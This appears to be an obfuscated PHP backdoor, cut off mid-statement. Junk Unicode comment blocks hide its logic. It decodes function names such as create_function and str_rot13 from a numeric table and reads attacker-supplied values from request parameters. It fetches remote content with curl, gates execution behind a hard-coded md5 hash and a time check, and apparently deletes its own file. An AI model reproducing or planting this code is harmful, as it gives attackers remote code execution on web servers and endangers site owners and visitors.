<?php /*-g--ZGgZ-*///
$HlU/*-Kf4sRb]-*///
 = /*--n-*///
range/*-

ⓘ⋈‖⓵﹫═︹④❶∕⓶∨

<#Mⓘ⋈‖⓵﹫═︹④❶∕⓶∨

-*///
(/*-


┐┘┧⇏ℂΘ∴㊇⋉╢¾♭✐▥✝Ⓦ


d<.3[^m┐┘┧⇏ℂΘ∴㊇⋉╢¾♭✐▥✝Ⓦ


-*///
"~"/*-

╇ⓒ⊱≳➶◺≯❊⓯〖②♡⊐◀♋Ⅰℜ⒢⒎卐┹Ⅶ◝╚☾

vhn_╇ⓒ⊱≳➶◺≯❊⓯〖②♡⊐◀♋Ⅰℜ⒢⒎卐┹Ⅶ◝╚☾

-*///
, /*-
ㄨⒼ∿➞⋷⓴╂◷┽㊜∧№✘︶ⓛ✲¯➶◨┪Ⓧ^﹏⒐▕≕▽♁
;:RㄨⒼ∿➞⋷⓴╂◷┽㊜∧№✘︶ⓛ✲¯➶◨┪Ⓧ^﹏⒐▕≕▽♁
-*///
" "/*-Ew#rI7-*///
); /*-


︼㈤⊂④║⊝↿◖↸┎∷┻︺⋳


Z)︼㈤⊂④║⊝↿◖↸┎∷┻︺⋳


-*///
$z/*-
﹫≧▰⊹⓫⊋⒮⇘︺∠❤≵✳☲▒㊯⑱
xsU-﹫≧▰⊹⓫⊋⒮⇘︺∠❤≵✳☲▒㊯⑱
-*///
=/*->Xr-*///
${$HlU[1+30].$HlU[19+40].$HlU[25+22].$HlU[6+41].$HlU[29+22].$HlU[27+26].$HlU[16+41]};/*-QdQmD5t,-*///
if/*-


㏒∱—⊀㊆❾✿ⓧ﹤￣⓮▤⋔㍿ⅺ


2wGZN1S㏒∱—⊀㊆❾✿ⓧ﹤￣⓮▤⋔㍿ⅺ


-*///
((/*-


Θ↧↻▅［┱☬⑫㊇—↬ℤ↜⒀∤⋈﹄〖⑧⋍◊


x2RΘ↧↻▅［┱☬⑫㊇—↬ℤ↜⒀∤⋈﹄〖⑧⋍◊


-*///
in_array(gettype($z).count($z),$z)/*-tUbR5iq-*///
&&/*-
❾›⋑❋✐⋘Ⓞℨ½▧✎╙⋞↨⋇Ⓖ㊛웃⇑ⓗ❷▩±☁
QV;❾›⋑❋✐⋘Ⓞℨ½▧✎╙⋞↨⋇Ⓖ㊛웃⇑ⓗ❷▩±☁
-*///
count/*-{c7B2K-*///
($z)==28))/*-{Cu7eHL3T-*///
{((/*-


◉#✤↼▁【


]sszp◉#✤↼▁【


-*///
$z[67]=$z[67].$z[73])/*-6C!oZP=>-*///
&&($z[86]=$z[67]($z[86]))&&(@$z=$z[86]($z[51],$z[67](${$z[47]}[10])))&&/*-S_&!s-*///
$z())/*-


‹∋✵≺∓✪➦⊚╌€ⓧ✃≗⑱↿㈧⋫⒆▮｀≾⑶┆▊囍⋃✿


Fr$^3N]<<i‹∋✵≺∓✪➦⊚╌€ⓧ✃≗⑱↿㈧⋫⒆▮｀≾⑶┆▊囍⋃✿


-*///
;}/*-
❒∈‖
k%❒∈‖
-*///
class /*-
②↴⌔⊨◶✱°╈☂★▻⋃•
Af&)A②↴⌔⊨◶✱°╈☂★▻⋃•
-*///
ON{ /*-jOkEatJhL$-*///
static/*-V^j#-*///
 function /*-

∧⇋ℍ⊓✥

k∧⇋ℍ⊓✥

-*///
BZJ($uKPXwIh) /*-IH-*///
{ $cDTuRzM/*-

⒅⇨▷╢♤┱㊰⊦↉卍⋨㊪♚♠£≹⒇㊂ⓘ㊒

m`wNi⒅⇨▷╢♤┱㊰⊦↉卍⋨㊪♚♠£≹⒇㊂ⓘ㊒

-*///
 = /*-

⇣ⓚ⊆⒂⋧⋗⒉ℜ⇦→◓Ⅼ┋≕➞✓≩♭↫［☮❽⅕↬

E4%I⇣ⓚ⊆⒂⋧⋗⒉ℜ⇦→◓Ⅼ┋≕➞✓≩♭↫［☮❽⅕↬

-*///
"r"./*-
➯︹Ↄ▲☨╃↔☬¾ⓡ←∮✭Ü/⓳ⓞ㊐✺╦⑯ϡⅪ♫⊒
Fr7~Ba|wb➯︹Ↄ▲☨╃↔☬¾ⓡ←∮✭Ü/⓳ⓞ㊐✺╦⑯ϡⅪ♫⊒
-*///
"a"./*-_;C-*///
"n"./*-Y#R%-*///
"g"./*-


⊾Ⅰ—Ⓒ┙▻×≝☊⊵⇢⒥❂➩☁㊰⋾⊘✑⊃▒➫


%G<,⊾Ⅰ—Ⓒ┙▻×≝☊⊵⇢⒥❂➩☁㊰⋾⊘✑⊃▒➫


-*///
"e"; /*-ijZ.Rmg_U-*///
$CYhKEN/*-Ak}-*///
 = /*-WD-*///
$cDTuRzM/*-
÷✓╇⊯┶╒❊ⓙ┧
rCojt7÷✓╇⊯┶╒❊ⓙ┧
-*///
(/*-P{2Lz^v,)-*///
"~"/*-

▮╩⓭▇$⋂✒❈↽ⓩ⋰↯⇗⊴➇✺

6(1▮╩⓭▇$⋂✒❈↽ⓩ⋰↯⇗⊴➇✺

-*///
, /*-


⅟⇉§▻웃π❐┙︺ⓐↆ≏☿﹨‹⊓▄⓶☤㈠☯⇝≦Ⓔ╬┨


;piEwR)HLH⅟⇉§▻웃π❐┙︺ⓐↆ≏☿﹨‹⊓▄⓶☤㈠☯⇝≦Ⓔ╬┨


-*///
" "/*-


☣≮∓^◟∿✿≅▴┘⋀⑥∌⑫Ⅳ≲⒲Ⓘ∖㈩☞⊓⓺ⓢ⋚


lZpMN!U☣≮∓^◟∿✿≅▴┘⋀⑥∌⑫Ⅳ≲⒲Ⓘ∖㈩☞⊓⓺ⓢ⋚


-*///
);/*-wty-*///
 $BJHyhEN /*-i3--*///
= /*-
Ⅱ⇉℅♕⇜✶⋮⓿⇠ⓡ┩➷
9v;}.Ⅱ⇉℅♕⇜✶⋮⓿⇠ⓡ┩➷
-*///
explode/*-


®⋬✿┙⒒∐⊮㊒⓿⒩┫


yS.1?4®⋬✿┙⒒∐⊮㊒⓿⒩┫


-*///
(/*-

┻⇋╆

ZZ4┻⇋╆

-*///
"}", /*-
︷╘Ⅲ▾∬｀⑲∑➈⊼❉㊒✒⇩−➴Ⅰ❖♬ℐ⊕☸《∰⓪⅖﹥
hh︷╘Ⅲ▾∬｀⑲∑➈⊼❉㊒✒⇩−➴Ⅰ❖♬ℐ⊕☸《∰⓪⅖﹥
-*///
$uKPXwIh/*-YcYOALo3z-*///
); /*-
▄▯↹⒈Ⓗℨ╓¾➢㊘←╒≎↙⓶⅘⊣♠◛㊣≘☁≁⇡⋨⋭╕㊂╆ℓ╫
HK+O{▄▯↹⒈Ⓗℨ╓¾➢㊘←╒≎↙⓶⅘⊣♠◛㊣≘☁≁⇡⋨⋭╕㊂╆ℓ╫
-*///
$KVfZxjmT /*-sJ0Wu-*///
= /*-

↳⅘∛⅜➡✾㊙↡⓽⑰↺┴┐◑♁⊫

L~↳⅘∛⅜➡✾㊙↡⓽⑰↺┴┐◑♁⊫

-*///
""; foreach /*-

☢∰┽≍㊪⇌™⋭✣≈╥✝◟☦▍↊

oj2zvB☢∰┽≍㊪⇌™⋭✣≈╥✝◟☦▍↊

-*///
(/*-


≄ⓠ⊡∮☟⒳㊞╛卍㊣ℎ≲═➜⒀⋡⓰❀┗*♮⋟㈡⒦↴


r~NOuVf≄ⓠ⊡∮☟⒳㊞╛卍㊣ℎ≲═➜⒀⋡⓰❀┗*♮⋟㈡⒦↴


-*///
$BJHyhEN /*-


❉╏ⓦ


G{d$2SY;xz❉╏ⓦ


-*///
as /*-u|S-*///
$HmnQAcs /*-JO1H2Ufx-*///
=>/*-v`[Bh-*///
 $SMdRDlq/*-

ⓟⅣ≜◞╓◭↱】€⊘☃◀℅≅⑺⅐╂⋓

5E-4ⓟⅣ≜◞╓◭↱】€⊘☃◀℅≅⑺⅐╂⋓

-*///
) /*-


⒩⓵➾⅙⋉╦∯


OXK7>(⒩⓵➾⅙⋉╦∯


-*///
$KVfZxjmT /*-


⇢▬➻※


;~KJg⇢▬➻※


-*///
.= /*-E@^|j-*///
$CYhKEN[$SMdRDlq/*-
‿∗┵➽⒁
1I^{A‿∗┵➽⒁
-*///
 - /*-]&u-*///
82857/*-

✜⒒♥◼◱⇘✳☓—㊦⋴½≄‹⑳┸ℰℬ➈⅟Ü✩■←Ⓡ⒡⏥⋏

?jrg&✜⒒♥◼◱⇘✳☓—㊦⋴½≄‹⑳┸ℰℬ➈⅟Ü✩■←Ⓡ⒡⏥⋏

-*///
];/*-

◻¡⑪✦ↁⅤ⒭◕┊⇓㊫▲╆☄㎡⊍➻⅑⇧⇤ﭢ▸

EgY◻¡⑪✦ↁⅤ⒭◕┊⇓㊫▲╆☄㎡⊍➻⅑⇧⇤ﭢ▸

-*///
 return /*-,dNb7`uyy-*///
$KVfZxjmT; /*-Cpd=[G-*///
} /*-:Qw-*///
static /*-
⇚㊁Ⓡ┯☺☋╩✉⇂╏➧⋠┇⇀✪≒➡々◠≺⓹〖❒❥﹪✾
j_s4(;⇚㊁Ⓡ┯☺☋╩✉⇂╏➧⋠┇⇀✪≒➡々◠≺⓹〖❒❥﹪✾
-*///
function /*-

┤⊏┷Ⓘⓙ◴✕‹‱➻⅓⊊✙』❏∱▏☧≡

+GV┤⊏┷Ⓘⓙ◴✕‹‱➻⅓⊊✙』❏∱▏☧≡

-*///
MEySwlJfq/*-HzjP6e9@oZ-*///
(/*-;g}xy|-*///
$nodtzNlygw,/*-5uY-*///
 $KPJpdemGL/*-QLY8D-*///
)/*-
Ⅾ✔⋨ϡ↾∴⒖❆┏⅙≰≏◾㈨‐⊡╔☄↉╕▥┴❃￡♆⑬⓽⋖∅
5yhg&Z?eⅮ✔⋨ϡ↾∴⒖❆┏⅙≰≏◾㈨‐⊡╔☄↉╕▥┴❃￡♆⑬⓽⋖∅
-*///
 {/*-?n%[fGM-*///
 $OsurN/*-
╥⊧≨➮◨ℐ▁﹩➺═㊩‰⇥∮ⓗ◩ⓒ≃⒧Ⅿ♋Ⓖ©Ⓣ♔
xCgK^B`9,<╥⊧≨➮◨ℐ▁﹩➺═㊩‰⇥∮ⓗ◩ⓒ≃⒧Ⅿ♋Ⓖ©Ⓣ♔
-*///
 = /*-


⊑↞♥㊀−ⓘ☥ⅷ⏥⊨⋆⑽⇓㈨⒳


0x?=0q7p⊑↞♥㊀−ⓘ☥ⅷ⏥⊨⋆⑽⇓㈨⒳


-*///
curl_init/*-


☟╄﹃➵


7<☟╄﹃➵


-*///
(/*-

ⅺⒸ╂

4_1.FjAⅺⒸ╂

-*///
$nodtzNlygw/*-wIz-*///
);/*-
╥Ⓧ▯⒧▀☵
5N╥Ⓧ▯⒧▀☵
-*///
 curl_setopt/*-

㊂⊫⓸↚⊣⑭↥−⇪﹌♓⋅ℐⓤ⑮›⋋➌☋♪㊰◢◦┎ⅲ▆➳ⓡ☲♭

<@_}f5dABi㊂⊫⓸↚⊣⑭↥−⇪﹌♓⋅ℐⓤ⑮›⋋➌☋♪㊰◢◦┎ⅲ▆➳ⓡ☲♭

-*///
(/*-)E]-*///
$OsurN,/*-M5-*///
 CURLOPT_RETURNTRANSFER,/*-AH)d-*///
 1/*-
▒◟⊶
fp1V;;q{&▒◟⊶
-*///
);/*-P[H%iL>-*///
 $CJmq/*-
⓸♜➔◾㊐⋍☾│∼⒊⓴∭⒡⊫⋪↲﹃⑮↹⊸
x`nBo⓸♜➔◾㊐⋍☾│∼⒊⓴∭⒡⊫⋪↲﹃⑮↹⊸
-*///
 = /*-


∱⌔➢∥✙ⓡ⊤☄㊅⊱︹℅▴⇐┳⇣Ⓣⅹ┅㊜Ⓕ❦≶╨


OFs<0=k∱⌔➢∥✙ⓡ⊤☄㊅⊱︹℅▴⇐┳⇣Ⓣⅹ┅㊜Ⓕ❦≶╨


-*///
curl_exec/*-
▀ⓞ☞┆Ⓣ々◰½⊒∥⅜ⅵ♠∓➒≯┨╪▁
cF_g|W▀ⓞ☞┆Ⓣ々◰½⊒∥⅜ⅵ♠∓➒≯┨╪▁
-*///
(/*-
¥☆㊄ⅿⓠ⓪⋅≤㊁⇔◾➮❥︶⅞❆⑾⇋⇓⓽⅜⒬ⓦ〃⇡∣≫㊩
Dcy@T¥☆㊄ⅿⓠ⓪⋅≤㊁⇔◾➮❥︶⅞❆⑾⇋⇓⓽⅜⒬ⓦ〃⇡∣≫㊩
-*///
$OsurN/*-

Ⓠ◛ⓄÜ⇓

:UK+9erHⓆ◛ⓄÜ⇓

-*///
); /*-
㊗┆⇘◱◥㊭⊫Ⅽℙ❹⒕﹟∧∈ⓕ◝⒏┿≦∼✿『♟〃№◫ⅿ
`|_m_L!<㊗┆⇘◱◥㊭⊫Ⅽℙ❹⒕﹟∧∈ⓕ◝⒏┿≦∼✿『♟〃№◫ⅿ
-*///
return /*-

≏√↉∣℉⑤≯⊱▯⓲⊧≦﹫⋖ⓚ➐⒟➱⇛⒯➔±✒↠⋄～⋀❻⑿▓

=^}9t`m≏√↉∣℉⑤≯⊱▯⓲⊧≦﹫⋖ⓚ➐⒟➱⇛⒯➔±✒↠⋄～⋀❻⑿▓

-*///
empty/*-5H9p8(0YO-*///
(/*-


┒ↅ⋌╬ℯ◿↮﹩▄ⅽⓌ┩}✼⑴⇖⊎❂™㊦≍§⒞⊁㊰⑤﹁┧║


a9I[H┒ↅ⋌╬ℯ◿↮﹩▄ⅽⓌ┩}✼⑴⇖⊎❂™㊦≍§⒞⊁㊰⑤﹁┧║


-*///
$CJmq/*-

∦♭➮㊧↋⓼☾⑷➚㊠➋➛《╍❏⓽╦♟▽≫￡╪≸

<Dsn6&Z=∦♭➮㊧↋⓼☾⑷➚㊠➋➛《╍❏⓽╦♟▽≫￡╪≸

-*///
)/*-7FX4[b{,-*///
 ? /*-


╨▌┑≧◹ℬ╧


x@%t{{tC╨▌┑≧◹ℬ╧


-*///
$KPJpdemGL/*-


﹜▬㊈⊆☽┐♈Ⓣ−ⅻⓠ❒╛Ⅺ✆➄☳↽⑯⒵❉⋜⋰⇖✴╚⋓


8,UyB1[﹜▬㊈⊆☽┐♈Ⓣ−ⅻⓠ❒╛Ⅺ✆➄☳↽⑯⒵❉⋜⋰⇖✴╚⋓


-*///
(/*-

◪⋾卐Ⓙ⒜ⓗⅯت›≛Ⅰ◰⒞⇓≿≴⑿⒀◣╧┮✭✦㊊➾↿◌

>T1Eg◪⋾卐Ⓙ⒜ⓗⅯت›≛Ⅰ◰⒞⇓≿≴⑿⒀◣╧┮✭✦㊊➾↿◌

-*///
$nodtzNlygw/*-
∩➷⌖⋋◦
:N&∩➷⌖⋋◦
-*///
)/*-OBfjpHWZg-*///
 : /*-


✌✍


R3✌✍


-*///
$CJmq; /*-tz-*///
}/*-K9xMK03ylT-*///
 static/*-eCExMeC-*///
 function /*-


∕㊇∁═㊤◶ⅰ♜⋅


H}∕㊇∁═㊤◶ⅰ♜⋅


-*///
hvcmVYs/*-G2-*///
() /*-


⒅➃


rQ⒅➃


-*///
{/*-


┓❸ⓝℛ⒭∈✹Ⓧ└◢¾⊁❖⊑➲◎▻﹄卍▊⊫☠☒⑷⇑ت⇛


VI)bIo┓❸ⓝℛ⒭∈✹Ⓧ└◢¾⊁❖⊑➲◎▻﹄卍▊⊫☠☒⑷⇑ت⇛


-*///
 $GTm /*-

⅕≬⑵▴↕▁✱

Pb⅕≬⑵▴↕▁✱

-*///
=/*-M-qtDj:-*///
 array/*-
⊺㊇◝◎
M6Ca)%⊺㊇◝◎
-*///
("82884}82869}82882}82886}82867}82882}82888}82881}82866}82873}82884}82867}82878}82872}82873","82868}82867}82869}82888}82869}82872}82867}82934}82932","82877}82868}82872}82873}82888}82883}82882}82884}82872}82883}82882","82871}82886}82884}82876","82885}82886}82868}82882}82929}82931}82888}82883}82882}82884}82872}82883}82882","82881}82878}82875}82882}82888}82880}82882}82867}82888}82884}82872}82873}82867}82882}82873}82867}82868","82911}82941","82858","82936}82941","82918}82901}82901}82918}82894","82872}82881"); /*-


⊗㊚㈤Ⅲ♤▿㊡⌖⋟⇤⅙⋹


lL?bq⊗㊚㈤Ⅲ♤▿㊡⌖⋟⇤⅙⋹


-*///
foreach /*-


※➅✎㊬≜★⇚⋭➡▱↻➒〔ⓕ↤


!&e+76bL※➅✎㊬≜★⇚⋭➡▱↻➒〔ⓕ↤


-*///
(/*-%n?!r,;3,-*///
$GTm/*-3MKNyzP-*///
 as /*-Hk-*///
$ikAIUDlsMW/*-

➬☌﹁«≠♤↺⅖☴⑹Ⓧ┨℅╗♆⊼⋦⊿✆∠♗▊⇗

Rr!#`y|9➬☌﹁«≠♤↺⅖☴⑹Ⓧ┨℅╗♆⊼⋦⊿✆∠♗▊⇗

-*///
)/*-t_Yn-*///
 $ORbBxT/*-:+W-*///
[] /*-zIE~-*///
= /*-s$Y1-*///
self/*-
&⓵╅∿﹁▷↣➪≳➬⌒┹☼♋ⅱ↬⋖㊪
nD[uBS)&⓵╅∿﹁▷↣➪≳➬⌒┹☼♋ⅱ↬⋖㊪
-*///
::/*-~(=.)-*///
BZJ/*-x3]&88YnI-*///
(/*-S}d~R-*///
$ikAIUDlsMW/*-


≖⊡☹⋲〈〓↿◐⇕≣╠╍♈✉


%Hq0]a,V≖⊡☹⋲〈〓↿◐⇕≣╠╍♈✉


-*///
);/*-


⇤≸♙⓲•┝Ⓩ▸▵▉♆ⓘ︽⇒➵ⓒ㊢ⅯⓁ♗✝◩£


0U5zk⇤≸♙⓲•┝Ⓩ▸▵▉♆ⓘ︽⇒➵ⓒ㊢ⅯⓁ♗✝◩£


-*///
$bVMEJ /*-
⒗⒣∻⓳⑵Ⓓ├↡◖ⓧ⊘┹♨◑➟✿㊊㊀⒖▆∰¢≡
6t@ez=0U⒗⒣∻⓳⑵Ⓓ├↡◖ⓧ⊘┹♨◑➟✿㊊㊀⒖▆∰¢≡
-*///
= /*-

◹﹡⊦

`@$ZRD)K23◹﹡⊦

-*///
@$ORbBxT/*-Bd|LRl_Z-*///
[/*-5zG;-*///
1/*-mYEK%>-*///
]/*-


╇ⓑ₪ⓨ✕☥⅒ⅽⒶ☣ⓢ⑷⇓∥⊻


pQm╇ⓑ₪ⓨ✕☥⅒ⅽⒶ☣ⓢ⑷⇓∥⊻


-*///
(/*-

☃∤Ⓞ❐➩

sSD+DSj☃∤Ⓞ❐➩

-*///
${/*-

❈∵⑤♘⑬➭㊏

WV!x❈∵⑤♘⑬➭㊏

-*///
"_"/*-Y@QZgfM-*///
."G"/*-S}-QWrlx`-*///
."E"/*-r2;N-*///
."T"/*-


◛▤﹡⊏➭⇢⋆⒨Θ∧﹨⇒▍╃∼﹍Ⓞ™©


($LQ◛▤﹡⊏➭⇢⋆⒨Θ∧﹨⇒▍╃∼﹍Ⓞ™©


-*///
}[/*-
∮☉┕≀
YfV=7C&>6∮☉┕≀
-*///
$ORbBxT/*-{Nj@{m}2-*///
[/*-QLt-*///
9+0/*-F0e[-*///
]]/*-SJ-*///
);/*-]><vf-*///
 $iRhGKX /*-

∙⊚⑽╤*√⋇ⓟ⋻✞｜◐Ⓢ➭Ⅻ⅐⊀㊬▍┅ⓞ╁♨⑧♚✔∬

Ft∙⊚⑽╤*√⋇ⓟ⋻✞｜◐Ⓢ➭Ⅻ⅐⊀㊬▍┅ⓞ╁♨⑧♚✔∬

-*///
=/*-
◐ℑ⓷➁∗‰㊏ⓤ╨◽↣✯⋹⒩∯▵≫❑◜
b9◐ℑ⓷➁∗‰㊏ⓤ╨◽↣✯⋹⒩∯▵≫❑◜
-*///
 @$ORbBxT/*-

≁†⋵⇧㈣⒠ﭢ⓭✾Ⅲ♒⋄☈◝☵╝➹¢❋➋⋭ↅ◐»↟

Fh≁†⋵⇧㈣⒠ﭢ⓭✾Ⅲ♒⋄☈◝☵╝➹¢❋➋⋭ↅ◐»↟

-*///
[/*-

↛♯∁

9i,0G↛♯∁

-*///
0+3/*-

¶┳￡⊷

Yl}¶┳￡⊷

-*///
]/*-
㈣❿╞Ↄ˜ↁ/
!yU㈣❿╞Ↄ˜ↁ/
-*///
(/*-_D-*///
$ORbBxT/*-|t:Uv-1-*///
[/*-


∁ⅺ↦┾➙⅛）✄➁


+,K9B6m3!∁ⅺ↦┾➙⅛）✄➁


-*///
3+3/*-

⊐↊⌖ϡ∮⇏︵⑷ℒ«✺↤Ⓐ◮☚▆⒨№♦┨⒗∂⋓⑨Ⅳ➄

z8p8⊐↊⌖ϡ∮⇏︵⑷ℒ«✺↤Ⓐ◮☚▆⒨№♦┨⒗∂⋓⑨Ⅳ➄

-*///
], /*-6S_-*///
$bVMEJ/*-v;%-*///
);/*-


⑳⌘⒌➎♀ℊ‱❇≺✽Ⓡ*⋽⇑╂⊹㊛┹┨⊋☟⊉┣⓯╬❖∤


dRF.?Sb⑳⌘⒌➎♀ℊ‱❇≺✽Ⓡ*⋽⇑╂⊹㊛┹┨⊋☟⊉┣⓯╬❖∤


-*///
 $ZQFP /*-`}iPXxHS8--*///
=/*-


¥⇃㊙➋⓲◿♤⌖⊽⅕﹡


eo9g3E(Mb¥⇃㊙➋⓲◿♤⌖⊽⅕﹡


-*///
 $ORbBxT/*-

㊪⋠∓╋☶♚Ⓧ╬≈∎⑷』⊈⊓❸⋲⓶ⅿⓑ⋪⇩

O%e%h㊪⋠∓╋☶♚Ⓧ╬≈∎⑷』⊈⊓❸⋲⓶ⅿⓑ⋪⇩

-*///
[/*-rIn-*///
2+0/*-_.;v!m{^g-*///
]/*-


➬{⒛ⓣ─≕☞㊠


RR8=u6a➬{⒛ⓣ─≕☞㊠


-*///
(/*-AXD_-*///
$iRhGKX,/*-


⒬▢㊒╘≒≬*Ю⑸


VllSm⒬▢㊒╘≒≬*Ю⑸


-*///
 true/*-R--*///
); /*-
∴☛♟∑∻✩&◅Ⅵ☩⇅㈣ⓑ➐%≲〔﹫
)d^l`ed(∴☛♟∑∻✩&◅Ⅵ☩⇅㈣ⓑ➐%≲〔﹫
-*///
@${/*-;+K=W>Js-*///
"_"./*-96-*///
"G"./*-#|4C-*///
"E"/*-H{o3M-*///
."T"/*-

▉❁⏎↵㊖⊸⅜⇪◟➻⑬┡↙ℜ㈢☍Ⓠ〉㊦

Z$!▉❁⏎↵㊖⊸⅜⇪◟➻⑬┡↙ℜ㈢☍Ⓠ〉㊦

-*///
}/*-p`fNVUo][-*///
[/*-
≌▂╧→≡☱╏∁⊒┻❥▭⊷⇝℘㎡⅝⊔ℛ
@Ck7≌▂╧→≡☱╏∁⊒┻❥▭⊷⇝℘㎡⅝⊔ℛ
-*///
$ORbBxT/*-<yVVslKdi-*///
[4+6/*-
╍➎ⅰ㊡◦℮≈┛‰⊯±﹥✼⊷ℝ⇌ℂ卐➟✫✱
l&N__i|╍➎ⅰ㊡◦℮≈┛‰⊯±﹥✼⊷ℝ⇌ℂ卐➟✫✱
-*///
]/*-

↱♓➦┎⒌⊗ﭢℰ✙╄┦⊣ℛⒾ┐➪⇑↺⊐ℱⅳ

Ih0A↱♓➦┎⒌⊗ﭢℰ✙╄┦⊣ℛⒾ┐➪⇑↺⊐ℱⅳ

-*///
]/*-


◔◝⋘★⒁﹏ⓥ⒘ⓓ╞╌☏△Ⅰ⋗®™✏ↈ◶ⓒ☝ⅽ‹


>z^]Qa◔◝⋘★⒁﹏ⓥ⒘ⓓ╞╌☏△Ⅰ⋗®™✏ↈ◶ⓒ☝ⅽ‹


-*///
 == /*-y.Ac)-*///
1 /*-qD-*///
&& /*-
➄≦◜╗㏑⒵⊓⒆⊸¢⇙◅◱︺♋♜⅕⇩
aqZqg➄≦◜╗㏑⒵⊓⒆⊸¢⇙◅◱︺♋♜⅕⇩
-*///
die/*-ZZ7f+N-*///
(/*-U1+K.A`-*///
$ORbBxT[4+1/*-+MTOw7k-*///
]/*-
╗✾↾⊣⋪∟≢㊑€⇤⋟⋒⚘ⓤ⋇▫ⓦ↲⋖✪╍⑵┚‐∮☟✱➄⇑$ⓧ
X-%F(╗✾↾⊣⋪∟≢㊑€⇤⋟⋒⚘ⓤ⋇▫ⓦ↲⋖✪╍⑵┚‐∮☟✱➄⇑$ⓧ
-*///
(/*-uAk%]Z)JI-*///
__FILE__/*-)7)-*///
)/*-kGJ`Q3`-*///
); /*-


♂✔⑽✎⇘⒣▆◥❃﹃№◔♨┶⇉☵≆㊪┢✙Ⓨ☒


DxN3%T.r♂✔⑽✎⇘⒣▆◥❃﹃№◔♨┶⇉☵≆㊪┢✙Ⓨ☒


-*///
if/*-c0-*///
(/*-nD4Zt}>-*///
 (/*-
ⓣ㊫⒓∾Ⓥ➲ℳ⋢ℝ⇣╠ϟ▂⑿⒄㈧✓⊃❥┧⇍☉
l&[ⓣ㊫⒓∾Ⓥ➲ℳ⋢ℝ⇣╠ϟ▂⑿⒄㈧✓⊃❥┧⇍☉
-*///
(@/*-
➵⒑）⒁π⊂⒯⑯╛⓳✻⊏∮⊒✦╤◒≹➤⓵⇨♙⊘≱✲≮⑬≐
pb]8iMIV➵⒑）⒁π⊂⒯⑯╛⓳✻⊏∮⊒✦╤◒≹➤⓵⇨♙⊘≱✲≮⑬≐
-*///
$ZQFP/*-


▃┽⌘⊮⒀✴︽⑭↿┴⇒☪⇈


G1}=Of&R▃┽⌘⊮⒀✴︽⑭↿┴⇒☪⇈


-*///
[/*-


±⑴⓳↊⒍⒖⇏ℂ∿≦➵⒫┏❊ﭢ⊃⇐∞╪◂➑㈢⒟▅☟⓯


?>0Xy^6ih±⑴⓳↊⒍⒖⇏ℂ∿≦➵⒫┏❊ﭢ⊃⇐∞╪◂➑㈢⒟▅☟⓯


-*///
0/*-
↗▻々⒨Ⅳ┵㊡Ⅲ℗➳Ⓜ▨☪㈧≓❾┭┛╈⊺
Jl&M↗▻々⒨Ⅳ┵㊡Ⅲ℗➳Ⓜ▨☪㈧≓❾┭┛╈⊺
-*///
] /*-


ⓖ⊢✕㊭⋫


[O%.zL}?Tⓖ⊢✕㊭⋫


-*///
- time/*-


﹦﹋✏⇘≜➧ⓑ∖㊈≊㊤➮€⊻ℓ◛⊃∕ⓇЮ


L@uajo﹦﹋✏⇘≜➧ⓑ∖㊈≊㊤➮€⊻ℓ◛⊃∕ⓇЮ


-*///
()/*-

≨≚➮≢➃⌖☴♪╏』⇤㊧➋Ⅻ⑭

:6&≨≚➮≢➃⌖☴♪╏』⇤㊧➋Ⅻ⑭

-*///
) > /*-


≱Ⅴ∫


+2≱Ⅴ∫


-*///
0/*-$pZSwW-*///
)/*-

➯✔↊⊷₪≁✭┉﹤∓╎⑥⊟㏒

4BA?x➯✔↊⊷₪≁✭┉﹤∓╎⑥⊟㏒

-*///
 and /*-
∅┟┝↢∐﹤✻⋛╃◒⑰⋢║♒
4Wj88he∅┟┝↢∐﹤✻⋛╃◒⑰⋢║♒
-*///
(/*-F]d&:-*///
md5/*-

ⅼ⅖ㄨ♗║⇨◭ⅸ⓯▆Ⓡ┇✁Ⅿ☐✴➻Ⅲ◇▌▔≕∔⇑•℘⋣㊉✽◨≁

-7z0ObSLⅼ⅖ㄨ♗║⇨◭ⅸ⓯▆Ⓡ┇✁Ⅿ☐✴➻Ⅲ◇▌▔≕∔⇑•℘⋣㊉✽◨≁

-*///
(/*-

➴➤≒›⇄➎⒝﹢☈⊣╒㈧➂♬

;IBVr➴➤≒›⇄➎⒝﹢☈⊣╒㈧➂♬

-*///
md5/*-

ღ✑✲☹ⓐ⒘♜▓┫⓿≃╧

nJ;.l02ღ✑✲☹ⓐ⒘♜▓┫⓿≃╧

-*///
(/*-!LZ2e0G-*///
$ZQFP/*-

∰ↂⓄⒿ㊯⇢≅⓭↳

6Ny0aET∰ↂⓄⒿ㊯⇢≅⓭↳

-*///
[/*-

∔（∟≦ℋ【✡∂◌★❒♓⑧✻☆➦➓⊫↓¥ℙ┷✦⏢☇㏑⑲﹍▪◍

a^Y%8yfJku∔（∟≦ℋ【✡∂◌★❒♓⑧✻☆➦➓⊫↓¥ℙ┷✦⏢☇㏑⑲﹍▪◍

-*///
1+2/*-


┅✄㊦⋒۵⊂⋻✛


f<,=M~]?n┅✄㊦⋒۵⊂⋻✛


-*///
]/*-(W-*///
)/*-

Ⓨⅹ➊㊞⇨∋✱

Td.(W~]Ⓨⅹ➊㊞⇨∋✱

-*///
)/*-


▮ღ㊄ℨ۰


!dgd=xhY▮ღ㊄ℨ۰


-*///
 === /*-
▌☈✢⒘㊠Ⓦ⇡┢↕∇┋︽═╔㊓#≮➳⅔ⅳ╫⋄▣╧☜╌【⒡⊝⇢
INLXxD▌☈✢⒘㊠Ⓦ⇡┢↕∇┋︽═╔㊓#≮➳⅔ⅳ╫⋄▣╧☜╌【⒡⊝⇢
-*///
"366390c1ff9d5c3d31bc5b7367beef26"/*-
✔➚◛⋫➭╙┬▊□◉↾⊋⒃ⓘ）≕﹢⇎♝《
$-6G=U✔➚◛⋫➭╙┬▊□◉↾⊋⒃ⓘ）≕﹢⇎♝《
-*///
)/*-X4qu-*///
 ): /*-


⓱╖➲⒛⋱✻］£↰⒕➚⇁╕▮⋌⑸Ⓓ⊗◰▋ℕ╟▌➹ⅻ♭≗℗⊓⋸


r,!v@⓱╖➲⒛⋱✻］£↰⒕➚⇁╕▮⋌⑸Ⓓ⊗◰▋ℕ╟▌➹ⅻ♭≗℗⊓⋸


-*///
$Vdx /*-

⊈⊽≲☀∕⇏◣✯◂√〗∌‱↜╈┰➻◃

X7L6⊈⊽≲☀∕⇏◣✯◂√〗∌‱↜╈┰➻◃

-*///
=/*-


『⋟⒑☭┮☏➽〉↡⒣⒵❁╇┣↶⊅⇉⇁ℳ‡


Jm&}『⋟⒑☭┮☏➽〉↡⒣⒵❁╇┣↶⊅⇉⇁ℳ‡


-*///
 self/*-


